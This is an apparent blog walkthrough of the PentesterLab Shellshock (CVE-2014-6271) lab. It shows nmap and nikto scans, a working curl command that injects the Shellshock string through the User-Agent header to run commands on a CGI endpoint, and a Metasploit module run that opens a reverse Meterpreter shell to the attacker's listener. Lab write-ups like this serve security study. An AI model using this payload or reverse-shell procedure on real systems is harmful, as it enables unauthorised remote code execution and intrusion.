CVE-2014-6271/Shellshock
Introduction
On 24 September 2014 a vulnerability was published under the name “CVE-2014-6271” aka “Shellshock“.
The nature of Shellshock was that with the vulnerable versions of bash (Unix Bourne-again shell), it was possible to inject code into bash and let it execute arbitrary commands. After the first found vulnerability there were more vulnerabilities found and most known versions were patched.
For educational purposes I’m going to examine a virtual lab from pentesterlab.com.
The course description details the exploitation of the vulnerability CVE-2014-6271. This vulnerability impacts the Bourne Again Shell “Bash”. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.
Location
https://www.pentesterlab.com/exercises/cve-2014-6271
Enumeration
┌─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -sV -p- 192.168.171.3 Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-08 11:35 CET Nmap scan report for 192.168.171.3 Host is up (0.00052s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0 (protocol 2.0) | ssh-hostkey: | 1024 8b:4c:a0:14:1c:3c:8c:29:3a:16:1c:f8:1a:70:2a:f3 (DSA) | 2048 d9:91:5d:c3:ed:78:b5:8c:9a:22:34:69:d5:68:6d:4e (RSA) |_ 256 b2:23:9a:fa:a7:7a:cb:cd:30:85:f9:cb:b8:17:ae:05 (ECDSA) 80/tcp open http Apache httpd 2.2.21 ((Unix) DAV/2) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.2.21 (Unix) DAV/2 |_http-title: [PentesterLab] CVE-2014-6271 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.60 seconds
I know that this machines sole purpose is exploiting shellshock, but I still run nikto.
┌─[n13mant@planetmars]─[~] └──╼ $nikto -h http://192.168.171.3 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.171.3 + Target Hostname: 192.168.171.3 + Target Port: 80 + Start Time: 2016-11-08 14:55:04 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.2.21 (Unix) DAV/2 + Server leaks inodes via ETags, header found with file /, inode: 7866, size: 1704, mtime: Thu Sep 25 11:56:50 2014 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + 8345 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2016-11-08 14:55:23 (GMT1) (19 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
As you can see, the outlined strings show that there is a ‘shellshock’ vulnerability ready to be exploited.
Now for the exploit. Because of the vulnerability I can inject code and let bash execute my commands.
I can do this with a simple thing as Curl.
┌─[n13mant@planetmars]─[~]
└──╼ $curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /usr/bin/id' http://192.168.171.3/cgi-bin/status
uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab)
As shown I use the magic string () { :;}; and I get remote code execution.
Reverse shell
I got RCE, but to really get into the remote machine, I prefer a reverse shell.
There are several scenarios for getting a reverse shell here. As netcat is running on the remote system, I could tunnel out to a listener on my local system. Also I could create a payload with msfvenom and wget it onto the remote system using SimpleHTTPServer or in this case use metasploit to create a reverse shell.
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.38-dev ]
+ -- --=[ 1594 exploits - 908 auxiliary - 274 post ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.171.3
RHOST => 192.168.171.3
msf exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/status/
TARGETURI => /cgi-bin/status/
msf exploit(apache_mod_cgi_bash_env_exec) > set LHOST 192.168.171.2
LHOST => 192.168.171.2
msf exploit(apache_mod_cgi_bash_env_exec) > set LPORT 31337
LPORT => 31337
msf exploit(apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 192.168.171.2:31337
[*] Command Stager progress - 100.60% done (837/832 bytes)
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.171.3
[*] Meterpreter session 1 opened (192.168.171.2:31337 -> 192.168.171.3:37867) at 2016-11-09 09:54:25 +0100
meterpreter > shell
Process 3314 created.
Channel 1 created.
/bin/sh: can't access tty; job control turned off
/var/www/cgi-bin $
There you go.
Explanation
Symantec has a real nice overview on how the exploit works.
